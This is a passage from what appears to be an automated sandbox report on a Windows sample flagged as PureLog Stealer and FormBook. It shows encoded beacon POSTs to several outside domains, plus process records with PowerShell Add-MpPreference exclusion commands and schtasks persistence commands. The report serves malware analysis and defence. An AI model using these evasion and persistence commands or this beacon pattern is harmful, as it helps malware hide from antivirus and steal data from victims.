                                Data Ascii: ion_dispatch/middleware/show_exceptions.rb:33:in `call&#39;</a><br><a class="trace-frames" data-frame-id="2" href="#">lograge (0.11.2) lib/lograge/rails_ext/rack/logger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" h
                                Aug 30, 2024 07:21:33.213861942 CEST  1236  IN
                                Data Ascii: 2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-frame-
                                Aug 30, 2024 07:21:33.213895082 CEST  1236  IN
                                Data Ascii: (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/acti
                                Aug 30, 2024 07:21:33.213926077 CEST  1236  IN
                                Data Ascii: trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&
                                Aug 30, 2024 07:21:33.213959932 CEST  1236  IN
                                Data Ascii: trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type="text/javascript"> var traceFrames = document.getElementsByClassName('trace-f
                                Aug 30, 2024 07:21:33.213993073 CEST  1236  IN
                                Data Ascii: <h2> Routes </h2> <p> Routes match in priority from top to bottom </p> <table id='route_table' class='route_table'> <thead> <tr> <th>Helper</th> <th>HTTP Verb</th> <th>Path</th> <th>
                                Aug 30, 2024 07:21:33.218919992 CEST  1012  IN
                                Data Ascii: /*path(.:format) </td> <td> <p>main#index {:path=&gt;/.*/}</p> </td></tr> </tbody></table><script type='text/javascript'> // support forEarch iterator on NodeList NodeList.prototype.forEach = Array.prototype.forEach;


                                Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                36  192.168.2.5  49754  216.40.34.41  80  5264  C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp  Bytes transferred  Direction  Data
                                Aug 30, 2024 07:21:35.223557949 CEST  347  OUT  GET /fgkz/?4f2t8=zruAGbX+zzZzwXhsAlQZAULZe4pnPcBNBYGP0N8wJF4ze778247Xmh3iJl2/TqyIQwvJNtjZAjEGWTxWxFAMT6BKV60sGMz7yg==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.hugelmann.org
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:21:35.711985111 CEST  1236  IN  HTTP/1.1 200 OK
                                x-frame-options: SAMEORIGIN
                                x-xss-protection: 1; mode=block
                                x-content-type-options: nosniff
                                x-download-options: noopen
                                x-permitted-cross-domain-policies: none
                                referrer-policy: strict-origin-when-cross-origin
                                content-type: text/html; charset=utf-8
                                etag: W/"f45da7fb00592c85875ef8210fc161fb"
                                cache-control: max-age=0, private, must-revalidate
                                x-request-id: 1dcd2c0a-dd40-41f0-b936-8e692a9083c5
                                x-runtime: 0.006172
                                transfer-encoding: chunked
                                connection: close
                                Data Ascii: 14B1<!DOCTYPE html><html><head><meta content='text/html; charset=UTF-8' http-equiv='Content-Type'><meta content='3CbaVvw-I7MlrmmmHz0bfbko7oMCW1mn2u65uWsWWB8' name='google-site-verification'><meta content='width=device-width, initial-scale=1.0' name='viewport'><meta content='telephone=no' name='format-detection'><link href='data:;base64,iVBORw0KGgo=' rel='icon'><title>hugelmann.org is coming soon</title><link rel="stylesheet" media="screen" href="https://fonts.googleapis.com/css?family=Open+Sans:300,400,600,700" /><link rel="stylesheet" media="all" href="/assets/application-2f7e7f30d812d0f3950918c7562df7e68eeeebd8649bdea2bc3844eb07fc8269.css" /></head><body><header><a rel="nofollow" href="https://www.hover.com/?source=park


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                37 | 192.168.2.5 | 49755 | 212.32.237.90 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:21:40.791929007 CEST | 621 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.sportspaj.com
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.sportspaj.com
                                Referer: http://www.sportspaj.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=byZ5Kp+MTG3XlxvAsfq1nLS/XCnU+L/YRTN/p4kgru9h+SieRxpR/FYMSXsW3RDfs14XDYaQ0viD6exbEf7FPROgYkNmP84yUKA1r67ELrS8S8SY+rkFswX75rL0Y2vVGQ0LoGMompW6RX6CwKNgfs9YQyRUxIwWIC3NeveDBokhBm8wqQ==
                                Aug 30, 2024 07:21:41.502012968 CEST | 366 | IN | HTTP/1.1 302 Found
                                cache-control: max-age=0, private, must-revalidate
                                connection: close
                                content-length: 11
                                date: Fri, 30 Aug 2024 05:21:40 GMT
                                location: http://survey-smiles.com
                                server: nginx
                                set-cookie: sid=bd4dd312-668f-11ef-8bfa-c4cf4829a2c4; path=/; domain=.sportspaj.com; expires=Wed, 17 Sep 2092 08:35:48 GMT; max-age=2147483647; HttpOnly
                                Data Ascii: Redirecting


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                38 | 192.168.2.5 | 49756 | 212.32.237.90 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:21:43.333590031 CEST | 641 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.sportspaj.com
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.sportspaj.com
                                Referer: http://www.sportspaj.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=byZ5Kp+MTG3X/R/AgcC1w7S4JSnU3r/cRTB/p6J9rdVh+zSeQwpR4FYMZ3sP6xDYs1F3DaeQ0v2D6fBbEsDGdxOiQEN4Bc4yUKA1r6uTLrK8SNCY4PwCqAX4v7L0c2vRGQ0poFJHmqu6RXqC+5VvE89eOCQFiYkdTj7AVP3VWodNEzQjttzxix1yEITgwvfGDFlo8R0=
                                Aug 30, 2024 07:21:43.937447071 CEST | 366 | IN | HTTP/1.1 302 Found
                                cache-control: max-age=0, private, must-revalidate
                                connection: close
                                content-length: 11
                                date: Fri, 30 Aug 2024 05:21:42 GMT
                                location: http://survey-smiles.com
                                server: nginx
                                set-cookie: sid=bec2e0e4-668f-11ef-9696-c4cfd0558d05; path=/; domain=.sportspaj.com; expires=Wed, 17 Sep 2092 08:35:50 GMT; max-age=2147483647; HttpOnly
                                Data Ascii: Redirecting


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                39 | 192.168.2.5 | 49757 | 212.32.237.90 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:21:45.857043028 CEST | 1654 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.sportspaj.com
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.sportspaj.com
                                Referer: http://www.sportspaj.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8= [TRUNCATED]


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                40 | 192.168.2.5 | 49758 | 212.32.237.90 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:21:48.390089035 CEST | 347 | OUT | GET /fgkz/?nFeHa=dbNpTj&4f2t8=WwxZJefTXlbC80/BpveukZyNeg7V77XnTSoth6J++MJln1PDQgVuwSMNXVc16zr9hGsIX6790/Sw0PUDFf+oDAGEaENhNNwIZQ== HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.sportspaj.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:21:52.388220072 CEST | 1056 | IN | HTTP/1.1 200 OK
                                accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile
                                cache-control: max-age=0, private, must-revalidate
                                connection: close
                                content-length: 611
                                content-type: text/html; charset=utf-8
                                date: Fri, 30 Aug 2024 05:21:51 GMT
                                server: nginx
                                set-cookie: sid=c1ca1a77-668f-11ef-8477-c4cf53dbc2a8; path=/; domain=.sportspaj.com; expires=Wed, 17 Sep 2092 08:35:59 GMT; max-age=2147483647; HttpOnly
                                Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://www.sportspaj.com/fgkz/?4f2t8=WwxZJefTXlbC80%2FBpveukZyNeg7V77XnTSoth6J++MJln1PDQgVuwSMNXVc16zr9hGsIX6790%2FSw0PUDFf+oDAGEaENhNNwIZQ%3D%3D&ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNTAwMjUwOCwiaWF0IjoxNzI0OTk1MzA4LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm82azYwa2kwOXI3bjdoNGczNWVhc2QiLCJuYmYiOjE3MjQ5OTUzMDgsInRzIjoxNzI0OTk1MzA4OTM5NTU0fQ.WhwdG522gCSTegPIUPVLvtJNKIOPD771kpxTzkFxwKo&nFeHa=dbNpTj&sid=c1ca1a77-668f-11ef-8477-c4cf53dbc2a8');</script></body></html>


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                41 | 192.168.2.5 | 49759 | 167.172.228.26 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:21:58.141253948 CEST | 627 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.noobblaster.com
                                Connection: close
                                Content-Length: 186
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.noobblaster.com
                                Referer: http://www.noobblaster.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=6kRy/k+v/GXMK9x4RUEkdvTz/sdi/47j9B0wQxxUEy20EhG2Y1vODiNW+g7L8L0ojtoFtbtPVnbZK197MvOZjlzcfuqzYtxKUS65yCFDfRMCdEwturTsG623e+9ZJWmNYxjDy4aCWKF4tTXQNttoX9r/26p0omIgXof9p7+DK33b/WW/Tw==
                                Aug 30, 2024 07:21:58.802145958 CEST | 152 | IN | HTTP/1.1 302
                                Server: nginx/1.20.1
                                Date: Fri, 30 Aug 2024 05:21:58 GMT
                                Content-Length: 0
                                Connection: close
                                Location: http://ww1.noobblaster.com


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                42 | 192.168.2.5 | 49760 | 167.172.228.26 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:22:00.675838947 CEST | 647 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.noobblaster.com
                                Connection: close
                                Content-Length: 206
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.noobblaster.com
                                Referer: http://www.noobblaster.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8=6kRy/k+v/GXMbsB4BHskaPT0zMdi1Y7n9B4wQw0REHu0EA22JEvOWiNWwA7Shb1qjtkjtZ5PVnPZK1t7PYaGl1zkLeqxH9xKUS65yCRtfRUCd0gtuPHrYq22OO9ZNWmJYxjty5GsWI94tRfQO8trZ9r58ao8jlxITLLoj5+HdTWf3j6sUPW1/ndQOvwlgfIgc69mOKs=
                                Aug 30, 2024 07:22:01.309004068 CEST | 152 | IN | HTTP/1.1 302
                                Server: nginx/1.20.1
                                Date: Fri, 30 Aug 2024 05:22:01 GMT
                                Content-Length: 0
                                Connection: close
                                Location: http://ww1.noobblaster.com


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                43 | 192.168.2.5 | 49761 | 167.172.228.26 | 80 | 5264 | C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:22:03.559797049 CEST | 1660 | OUT | POST /fgkz/ HTTP/1.1
                                Accept: */*
                                Accept-Encoding: gzip, deflate, br
                                Accept-Language: en-us
                                Host: www.noobblaster.com
                                Connection: close
                                Content-Length: 1218
                                Cache-Control: max-age=0
                                Content-Type: application/x-www-form-urlencoded
                                Origin: http://www.noobblaster.com
                                Referer: http://www.noobblaster.com/fgkz/
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Data Ascii: 4f2t8= [TRUNCATED]
                                Aug 30, 2024 07:22:04.226394892 CEST | 152 | IN | HTTP/1.1 302
                                Server: nginx/1.20.1
                                Date: Fri, 30 Aug 2024 05:22:04 GMT
                                Content-Length: 0
                                Connection: close
                                Location: http://ww1.noobblaster.com


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                44 | 192.168.2.5 | 49762 | 167.172.228.26 | 80
                                Timestamp | Bytes transferred | Direction | Data
                                Aug 30, 2024 07:22:06.450171947 CEST | 349 | OUT | GET /fgkz/?4f2t8=3m5S8RLi2FvoSMlAd2YNW/TJwuNR/4L3lTg0ZykUeQS0d3bBVkf5OCtf3wLO2p5Qie0G5ZQmXW/kTWMxHN/hjFLiWPmpcdZuTA==&nFeHa=dbNpTj HTTP/1.1
                                Accept: */*
                                Accept-Language: en-us
                                Host: www.noobblaster.com
                                Connection: close
                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                Aug 30, 2024 07:22:07.118612051 CEST | 152 | IN | HTTP/1.1 302
                                Server: nginx/1.20.1
                                Date: Fri, 30 Aug 2024 05:22:07 GMT
                                Content-Length: 0
                                Connection: close
                                Location: http://ww1.noobblaster.com



                                Target ID:0
                                Start time:01:17:57
                                Start date:30/08/2024
                                Path:C:\Users\user\Desktop\UnmxRI.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\UnmxRI.exe"
                                Imagebase:0xc0000
                                File size:1'097'216 bytes
                                MD5 hash:E34C33903020A81F3A09A69C29ADE426
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2100365796.0000000006850000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2086201250.00000000026E9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2086201250.0000000002727000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2099884400.0000000004FB0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2086201250.00000000024A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2090039067.00000000035B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low
                                Has exited:true

                                Target ID:3
                                Start time:01:17:58
                                Start date:30/08/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UnmxRI.exe"
                                Imagebase:0xe10000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:4
                                Start time:01:17:58
                                Start date:30/08/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:5
                                Start time:01:17:58
                                Start date:30/08/2024
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
                                Imagebase:0xe10000
                                File size:433'152 bytes
                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:6
                                Start time:01:17:58
                                Start date:30/08/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:7
                                Start time:01:17:58
                                Start date:30/08/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpB814.tmp"
                                Imagebase:0x480000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:8
                                Start time:01:17:59
                                Start date:30/08/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:9
                                Start time:01:18:00
                                Start date:30/08/2024
                                Path:C:\Users\user\Desktop\UnmxRI.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\UnmxRI.exe"
                                Imagebase:0xc60000
                                File size:1'097'216 bytes
                                MD5 hash:E34C33903020A81F3A09A69C29ADE426
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2230255401.0000000001750000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2229320188.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.2231534304.00000000039C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                Reputation:low
                                Has exited:true

                                Target ID:10
                                Start time:01:18:00
                                Start date:30/08/2024
                                Path:C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                                Imagebase:0x330000
                                File size:1'097'216 bytes
                                MD5 hash:E34C33903020A81F3A09A69C29ADE426
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.2169047373.0000000002917000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.2169047373.0000000002691000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.2169047373.00000000028D9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 66%, ReversingLabs
                                Reputation:low
                                Has exited:true

                                Target ID:11
                                Start time:01:18:03
                                Start date:30/08/2024
                                Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                Imagebase:0x7ff6ef0c0000
                                File size:496'640 bytes
                                MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                Has elevated privileges:true
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:12
                                Start time:01:18:06
                                Start date:30/08/2024
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tehuvFgZlLZK" /XML "C:\Users\user\AppData\Local\Temp\tmpD59E.tmp"
                                Imagebase:0x480000
                                File size:187'904 bytes
                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:13
                                Start time:01:18:06
                                Start date:30/08/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6d64d0000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:high
                                Has exited:true

                                Target ID:14
                                Start time:01:18:06
                                Start date:30/08/2024
                                Path:C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\tehuvFgZlLZK.exe"
                                Imagebase:0x650000
                                File size:1'097'216 bytes
                                MD5 hash:E34C33903020A81F3A09A69C29ADE426
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Target ID:15
                                Start time:01:18:09
                                Start date:30/08/2024
                                Path:C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe"
                                Imagebase:0xa50000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000F.00000002.4495556135.0000000004F30000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                Reputation:high
                                Has exited:false

                                Target ID:16
                                Start time:01:18:11
                                Start date:30/08/2024
                                Path:C:\Windows\SysWOW64\print.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\SysWOW64\print.exe"
                                Imagebase:0xdf0000
                                File size:14'848 bytes
                                MD5 hash:B6B0D7357995EFA5F07CEBD4593C7A9C
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4494256773.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4494637924.0000000000760000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.4494563547.0000000000720000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Reputation:moderate
                                Has exited:false

                                Target ID:18
                                Start time:01:18:23
                                Start date:30/08/2024
                                Path:C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Program Files (x86)\CtkKkqRCKTeLWorQMANFOxEffNdIrCJxUciuGWmfIeGBgUxWfyrOBLfjyucmmacESEsiL\NUJqNHNKrrpXWLOEvky.exe"
                                Imagebase:0xa50000
                                File size:140'800 bytes
                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
